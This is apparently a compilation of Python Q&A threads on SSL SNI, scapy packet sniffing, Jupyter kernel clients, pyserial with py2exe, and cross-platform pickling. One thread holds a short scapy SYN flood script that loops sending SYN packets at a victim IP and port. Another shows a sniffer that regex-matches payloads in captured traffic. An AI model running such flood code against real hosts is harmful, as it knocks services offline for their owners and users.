Shell not honoring interpreter? - python

I downloaded the Python 3.4 sources, built them, and installed them in /usr/local. make test ran fine.
$ ls /usr/local/bin/ | grep python
python3
python3.4
python3.4-config
python3.4m
python3.4m-config
python3-config
I've got a little script that tries to use SNI. SNI has been giving me trouble in Python (re: wrap_socket() got an unexpected keyword argument 'server_hostname'?), and a newer version of Python is supposed to fix it. The script looks like so:
#!/usr/local/bin/python3
import sys, ssl, socket, time

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = ssl.wrap_socket(s1,
                     ca_certs="./pki/signing-dss-cert.pem",
                     cert_reqs=ssl.CERT_REQUIRED,
                     ssl_version=ssl.PROTOCOL_TLSv1,
                     server_hostname="localhost")
s2.connect( ("localhost", 8443) )
s2.send("GET / ")
time.sleep(1)
s2.send("HTTP/1.1")
s2.send("\r\n")
time.sleep(1)
s2.send("Hostname: localhost")
s2.send("\r\n")
s2.send("\r\n")
When I attempt to run it, I still receive that damn TypeError: wrap_socket() got an unexpected keyword argument 'server_hostname' error.
EDIT: I tried Lukas' suggestion below and changed the line to:
s2 = ssl.SSLContext.wrap_socket(s1,
                                ca_certs="./pki/signing-dss-cert.pem",
                                cert_reqs=ssl.CERT_REQUIRED,
                                ssl_version=ssl.PROTOCOL_TLSv1,
                                server_hostname="localhost")
Now, when I run the script, my mouse pointer (the normal slanted arrow) turns into a crosshair (a plus sign) and I can drag boxes around the screen. After a minute or so, I get the following error:
$ ./fetch.sh
./fetch.sh: line 5: syntax error near unexpected token `('
./fetch.sh: line 5: `s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)'
After the above fails and the pointer returns to normal, I end up with a single image containing screen captures of the boxes I drew on the screen.
I'm beginning to think Python is a major pain in the ass and a waste of time. How can anyone justify two days of work when trying to do something simple like specifying a hostname in SSL?
Any ideas what I am doing wrong this time?

The patch you're referring to in the other question adds a server_hostname argument to the method ssl.SSLContext.wrap_socket.
The function you're calling, however, is the module-level ssl.wrap_socket, which doesn't take a server_hostname keyword argument.
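For reference, in Python 3.4 the SNI-capable path goes through an ssl.SSLContext instance rather than the module-level function; a minimal sketch (the protocol version, CA file, host, and port are simply copied from the question):
import socket, ssl

# Minimal sketch: build an SSLContext and let it wrap the socket with SNI.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations("./pki/signing-dss-cert.pem")

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = ctx.wrap_socket(s1, server_hostname="localhost")  # server_hostname enables SNI
s2.connect(("localhost", 8443))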
Edit: Try this:
from ssl import CERT_NONE
from ssl import PROTOCOL_SSLv23
from ssl import SSLSocket
import ssl, socket
import time

s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

def wrap_socket_with_sni(sock, keyfile=None, certfile=None,
                         server_side=False, cert_reqs=CERT_NONE,
                         ssl_version=PROTOCOL_SSLv23, ca_certs=None,
                         do_handshake_on_connect=True,
                         suppress_ragged_eofs=True,
                         ciphers=None,
                         server_hostname=None):
    return SSLSocket(sock=sock, keyfile=keyfile, certfile=certfile,
                     server_side=server_side, cert_reqs=cert_reqs,
                     ssl_version=ssl_version, ca_certs=ca_certs,
                     do_handshake_on_connect=do_handshake_on_connect,
                     suppress_ragged_eofs=suppress_ragged_eofs,
                     ciphers=ciphers, server_hostname=server_hostname)

s2 = wrap_socket_with_sni(s1,
                          ca_certs="./pki/signing-dss-cert.pem",
                          cert_reqs=ssl.CERT_REQUIRED,
                          ssl_version=ssl.PROTOCOL_TLSv1,
                          server_hostname="localhost")
# ...
All I did was copy over the wrap_socket helper function, extend it with a server_hostname keyword argument, and pass that along to the SSLSocket that it returns.

Related

Sniff network traffic with scapy and regular expressions?

I had my first look at Python's scapy package and wanted to test my first little script. To test the code below, I sent myself an e-mail containing the string "10000000000000". My expectation was that the minimal example below (with my network card in monitoring mode and executed as su) would produce command-line output for that e-mail specifically, but it doesn't. I am sure this is caused by my own misunderstanding of network traffic and TCP -- could anyone elucidate?
The virtual environment I set up uses Python 3.6.8.
(I have verified that I can sniff network traffic in general using the commented-out line; only when I try to filter packet contents via regular expressions is the result not what I expect.)
import optparse
import re

import scapy.all as sca
from scapy import packet
from scapy.layers.dns import DNS
from scapy.layers.dot11 import Dot11Beacon, Dot11ProbeReq
from scapy.layers.inet import TCP


class SniffDataTraffic:
    @staticmethod
    def find_expr(pack: packet) -> str:
        regex_dict = {'foo': r"1[0-9]{13}", 'bar': r"2[1-5]{14}"}
        raw_pack = pack.sprintf('%Raw.load%')
        found = {name: re.findall(regex, raw_pack) for name, regex in regex_dict.items()}
        for name, value in found.items():
            if value:
                return "[+] found {}: {}".format(name, value[0])


def main():
    try:
        print("[*] Starting sniffer")
        # sca.sniff(iface="xxxxxmon", prn=lambda x: x.summary(), store=False)
        sca.sniff(prn=SniffDataTraffic.find_expr, filter='tcp', iface="xxxxxmon", store=False)
    except KeyboardInterrupt:
        exit(0)


if __name__ == '__main__':
    main()
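In case it helps narrow things down, one common stumbling block is that not every TCP packet carries a Raw payload, and sprintf('%Raw.load%') just yields a placeholder string in that case. A minimal sketch of a guarded callback (find_payload_match is a hypothetical name, and the pattern reuses 'foo' from the question):
import re
from scapy.all import Raw, sniff

TARGET = re.compile(r"1[0-9]{13}")  # same pattern as 'foo' above

def find_payload_match(pack):
    # Only inspect packets that actually carry a Raw payload;
    # sprintf('%Raw.load%') yields a placeholder string otherwise.
    if not pack.haslayer(Raw):
        return None
    match = TARGET.search(pack.sprintf('%Raw.load%'))
    if match:
        return "[+] found foo: {}".format(match.group(0))

# e.g. sniff(prn=find_payload_match, filter='tcp', iface="xxxxxmon", store=False)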

python error on synflood attack

I am writing code for a SYN flood attack, but when I run the file with python I get errors.
SYNFlood.py file:
import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
target_ip = sys.argv[1] # the ip of the victim machine
target_port = sys.argv[2] # the port of the victim machine
print ("ip "+target_ip+" port "+target_port)
send(IP(src="192.168.x.x", dst="target_ip")/TCP(sport=135,dport=target_port), count=2000)
But when I am running the file with:
python SYNFlood.py target_ip target_port
I get the following error:
I have tried to alter the code as follows:
while (1 == 1):
    p = IP(dst=target_ip, id=1111, ttl=99) / TCP(sport=RandShort(), dport=int(target_port),
                                                 seq=12345, ack=1000, window=1000, flags="S")
    send(p, count=10)
But even though I get output on cmd,
when I run the command netstat -A on the target PC I don't see any SYN_RECV packets.
I have tried with
send(p, verbose=0, count=10)
but I don't get any output on either the destination PC or the source PC with the respective commands.
Try reinstalling scapy or scapy3k. This sounds like a build issue. Confirm you are using the correct scapy version.
I figured out that I had to run the program with the 32-bit version on Windows.

Executing code in ipython kernel with the KernelClient API

I have an existing IPython kernel with a connection file 'path/comm_file.json', and I want to execute code in this kernel using the KernelClient API (actually I'm not picky, any method will do...). From the Jupyter documentation I understood that this is the best way to do things. So I write the following code:
from jupyter_client import KernelClient
client = KernelClient(connection_file='path/comm_file.json')
client.execute('a = 10')
But the execute method leads to the following error:
File "C:\Python27\lib\site-packages\jupyter_client\client.py", line 249, in execute
self.shell_channel.send(msg)
File "C:\Python27\lib\site-packages\jupyter_client\client.py", line 143, in shell_channel
socket, self.session, self.ioloop
TypeError: object.__new__() takes no parameters
What am I doing wrong here??
I am also trying to figure out how the client works. Here's a place to start:
For a simple blocking client, you can have a look at how jupyter_test_client and jupyter_console work.
from pprint import pprint
from jupyter_client.consoleapp import JupyterConsoleApp


class MyKernelApp(JupyterConsoleApp):
    def __init__(self, connection_file, runtime_dir):
        self._dispatching = False
        self.existing = connection_file
        self.runtime_dir = runtime_dir
        self.initialize()


app = MyKernelApp("connection.json", "/tmp")
kc = app.kernel_client
kc.execute("print 'hello'")
msg = kc.iopub_channel.get_msg(block=True, timeout=1)
pprint(msg)
You will need helper functions to properly handle the zmq channels and JSON messages.
I was able to make a simple and bare KernelClient work for me with this:
from jupyter_client.blocking import BlockingKernelClient
kc = BlockingKernelClient(connection_file='path/comm_file.json')
kc.load_connection_file()
kc.start_channels()
msgid = kc.execute('a = 10')
reply = kc.get_shell_msg(timeout=5)
That's indeed how JupyterConsoleApp (used by jupyter_console) initializes its client when an existing kernel file is given.
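If you also want the output produced by the executed code, you can drain the iopub channel until the kernel reports that it is idle again. A rough sketch building on the BlockingKernelClient set up above (exact message handling may vary between jupyter_client versions):
import sys

msgid = kc.execute("print 'hello'")
while True:
    msg = kc.get_iopub_msg(timeout=5)
    if msg['parent_header'].get('msg_id') != msgid:
        continue  # output belonging to some other request
    if msg['msg_type'] == 'stream':
        sys.stdout.write(msg['content']['text'])
    elif msg['msg_type'] == 'status' and msg['content']['execution_state'] == 'idle':
        break  # the kernel finished handling this request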

Executable out of script containing serial_for_url

I have developed a Python script that makes a serial connection to a digital pump. I now need to make an executable out of it. However, even though the script works perfectly well when run with Python, and py2exe does produce the .exe, when I run the executable the following error occurs:
File: pump_model.pyc in line 96 in connect_new
File: serial\__init__.pyc in line 71 in serial_for_url
ValueError: invalid URL protocol 'loop' not known
The relevant piece of my code is the following:
# New serial connection
def connect_new(self, port_name):
    """Function for configuring a new serial connection."""
    try:
        self.ser = serial.Serial(port=port_name,
                                 baudrate=9600,
                                 parity='N',
                                 stopbits=1,
                                 bytesize=8,
                                 timeout=self.timeout_time)
    except serial.SerialException:
        self.ser = serial.serial_for_url('loop://',
                                         timeout=self.timeout_time)  # This line BLOWS!
    except:
        print sys.exc_info()[0]
    finally:
        self.initialize_pump()
I should note that the application was written on OS X and was tested on Windows with the Canopy Python distribution.
I had the exact same problem with "socket://" rather than "loop://".
I wasn't able to get the accepted answer to work; however, the following seems to succeed:
1) Add an explicit import of the offending urlhandler.* module:
import serial
# explicit import for py2exe - to fix "socket://" url issue
import serial.urlhandler.protocol_socket
# explicit import for py2exe - to fix "loop://" url issue (OP's particular prob)
import serial.urlhandler.protocol_loop
# use serial_for_url in normal manner
self._serial = serial.serial_for_url('socket://192.168.1.99:12000')
2) Generate a setup script for py2exe (see https://pypi.python.org/pypi/py2exe/) -- I've installed py2exe to a virtualenv:
path\to\env\Scripts\python.exe -m py2exe myscript.py -W mysetup.py
3) Edit mysetup.py to include the option (a sketch of the resulting mysetup.py follows after these steps):
zipfile="library.zip" # default generated value is None
(see also http://www.py2exe.org/index.cgi/ListOfOptions)
4) Build it:
path\to\env\Scripts\python.exe mysetup.py py2exe
5) Run it:
dist\myscript.exe
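For reference, the edited mysetup.py might end up looking roughly like this (a sketch only; the script name and the include list are assumptions based on the steps above):
# mysetup.py -- minimal py2exe setup sketch (script name is an assumption)
from distutils.core import setup
import py2exe

setup(
    console=['myscript.py'],
    zipfile='library.zip',  # instead of the generated default of None
    options={'py2exe': {'includes': ['serial.urlhandler.protocol_socket',
                                     'serial.urlhandler.protocol_loop']}},
)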
Found it!
It seems that for some reason the 'loop://' argument can't be recognized after the .exe is produced.
By studying pyserial's __init__.py I figured out that when issuing the command serial.serial_for_url('loop://') you essentially call:
sys.modules['serial.urlhandler.protocol_loop'].Serial("loop://")
So you have to first import the serial.urlhandler.protocol_loop module and then issue that command in place of the malfunctioning one:
__import__('serial.urlhandler.protocol_loop')
sys.modules['serial.urlhandler.protocol_loop'].Serial("loop://")
After this minor workaround it worked fine.

Pickle cross platform __dict__ attribute error

I'm having an issue with pickle. Things work fine between OS X and Linux, but not between Windows and Linux. All pickled strings are stored in memory and sent via an SSL socket. To be 100% clear, I have replaced all '\n's with ":::" and all '\r's with "===" (there were none). Scenario:
Client-Win: Small Business Server 2011 running Python 2.7
Client-Lin: Fedora Linux running Python 2.7
Server: Fedora Linux running Python 2.7
Client-Lin sends a pickled object to Server:
ccopy_reg:::_reconstructor:::p0:::(c__main__:::infoCollection:::p1:::c__builtin__:::tuple:::p2:::(VSTRINGA:::p3:::VSTRINGB:::p4:::VSTRINGC:::p5:::tp6:::tp7:::Rp8:::.
Client-Win sends a picked object to Server:
ccopy_reg:::_reconstructor:::p0:::(c__main__:::infoCollection:::p1:::c__builtin__:::tuple:::p2:::(VSTRINGA:::p3:::VSTRINGB:::p4:::VSTRINGC:::p5:::tp6:::tp7:::Rp8:::ccollections:::OrderedDict:::p9:::((lp10:::(lp11:::S'string_a':::p12:::ag3:::aa(lp13:::S'string_b':::p14:::ag4:::aa(lp15:::S'string_c':::p16:::ag5:::aatp17:::Rp18:::b.
For some reason the Windows client sends extra information along with the pickle, and when the Linux client tries to load the pickle string I get:
Unhandled exception in thread started by <function TestThread at 0x107de60>
Traceback (most recent call last):
File "./test.py", line 212, in TestThread
info = pickle.loads(p_string)
File "/usr/lib64/python2.7/pickle.py", line 1382, in loads
return Unpickler(file).load()
File "/usr/lib64/python2.7/pickle.py", line 858, in load
dispatch[key](self)
File "/usr/lib64/python2.7/pickle.py", line 1224, in load_build
d = inst.__dict__
AttributeError: 'infoCollection' object has no attribute '__dict__'
Any ideas?
EDIT
Adding additional requested information.
The infoCollection class is defined the same way on both clients:
infoCollection = collections.namedtuple('infoCollection', 'string_a, string_b, string_c')
def runtest():
    info = infoCollection('STRINGA', 'STRINGB', 'STRINGC')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ssl_sock = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
    ssl_sock.connect((server, serverport))
    ssl_sock.write(pickle.dumps(info))
    ssl_sock.close()
And the receiving function is much the same, but does:
p_string = ssl_sock.read()
info = pickle.loads(p_string)
Are you using different minor versions of Python? There's a bug in 2.7.3 that makes pickling namedtuples incompatible with older versions. See this:
http://ronrothman.com/public/leftbraned/python-2-7-3-bug-broke-my-namedtuple-unpickling/
A hack, but the issue appears to be due to namedtuples and pickle together in a cross-platform environment. I replaced the namedtuple with my own class and all works well.
class infoClass(object):
    pass


def infoCollection(string_a, string_b, string_c):
    i = infoClass()
    i.string_a = string_a
    i.string_b = string_b
    i.string_c = string_c
    return i
Have you tried saving as a binary pickle file?
with open('pickle.file', 'wb') as po:
    pickle.dump(obj, po)
Also, if you're porting between various OSes, and if info is just a namedtuple, have you looked at JSON (it's generally considered safer than pickle)?
with open('pickle.json', 'w') as po:
    json.dump(obj, po)
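If you do go the JSON route, note that a namedtuple serializes as a plain list; a small sketch (reusing the infoCollection namedtuple from the question) that keeps the field names and rebuilds the object on the other side:
import json

# Dump with field names preserved; namedtuple._asdict() gives an ordered mapping.
payload = json.dumps(info._asdict())

# Rebuild on the receiving side from the decoded dict.
d = json.loads(payload)
info2 = infoCollection(d['string_a'], d['string_b'], d['string_c'])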
Edit
From the ssl .read() docs it seems that .read() will only read at most 1024 bytes by default; I'll wager that your pickled info object is larger than that. It would be difficult to know how big info is a priori, and I don't know whether just setting nbytes to a huge number would do the trick (I think perhaps not). What happens if you do the following?
p_string = ssl_sock.read(nbytes=1000000)
info = pickle.loads(p_string)
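Alternatively, to be safe regardless of the object's size, keep reading until the peer closes the connection (a sketch; it assumes the sender closes its socket right after writing, as runtest() above does):
# Accumulate the whole pickled payload; a single read() may return only part of it.
chunks = []
while True:
    data = ssl_sock.read(4096)
    if not data:  # empty result means the peer closed the connection
        break
    chunks.append(data)
info = pickle.loads(''.join(chunks))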
Just install Python 2.7.8 from https://www.python.org/ftp/python/2.7.8/python-2.7.8.amd64.msi
